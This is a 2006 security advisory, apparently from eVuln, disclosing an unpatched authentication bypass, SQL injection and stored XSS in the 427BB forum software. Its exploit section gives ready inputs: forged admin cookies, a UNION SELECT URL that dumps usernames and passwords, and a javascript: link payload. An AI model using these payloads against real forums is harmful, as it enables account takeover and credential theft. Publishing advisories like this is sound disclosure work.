SecurityvulnsSECURITYVULNS:DOC:10945[eVuln] 427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS)
New eVuln Advisory:
427BB Multiple Vulnerabilities (Cookie-based Authentication Bypass, SQL Injections, XSS)
--------------------Summary----------------
Software: 427BB
Sowtware's Web Site: http://sourceforge.net/projects/fourtwosevenbb
Versions: checked: 2.2 and 2.2.1
Critical Level: Dangerous
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Published: 2006.01.07
eVuln ID: EV0018
-----------------Description--------------
427BB has multiple vulnerabilities.
- Authentication bypass using modified cookie values.
Vulnerabe scripts: login.php getvars.php
To authorize any logged-in user forum scripts checks only three cookie values:
username
authenticated
usertype
Forum dont make password comparison.
- 427BB has Multiple SQL Injection Vulnerabilities.
For example:
Vulnerabe script: showthread.php
Variable $ForumID isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code
- Arbitrary script code insertion is possible when posting a message containing URL.
Vulnerable Script: posts.php
Condition: visitor needs to click this link
--------------Exploit---------------------
- Authentication bypass using modified cookie values.
Cookie: username=admin;
Cookie: authenticated=1;
Cookie: usertype=admin;
- SQL Injection Example.
Need to be logged in as registered user.
http://host/bb427/showthread.php?ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal
- Arbitrary script code insertion.
Posting new message.
Message text:
[url=javascript:alert(123)]clickme[/url]
--------------Solution---------------------
No Patch available.
--------------Credit---------------------
Original Advisory:
http://evuln.com/vulns/18/summary.html
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)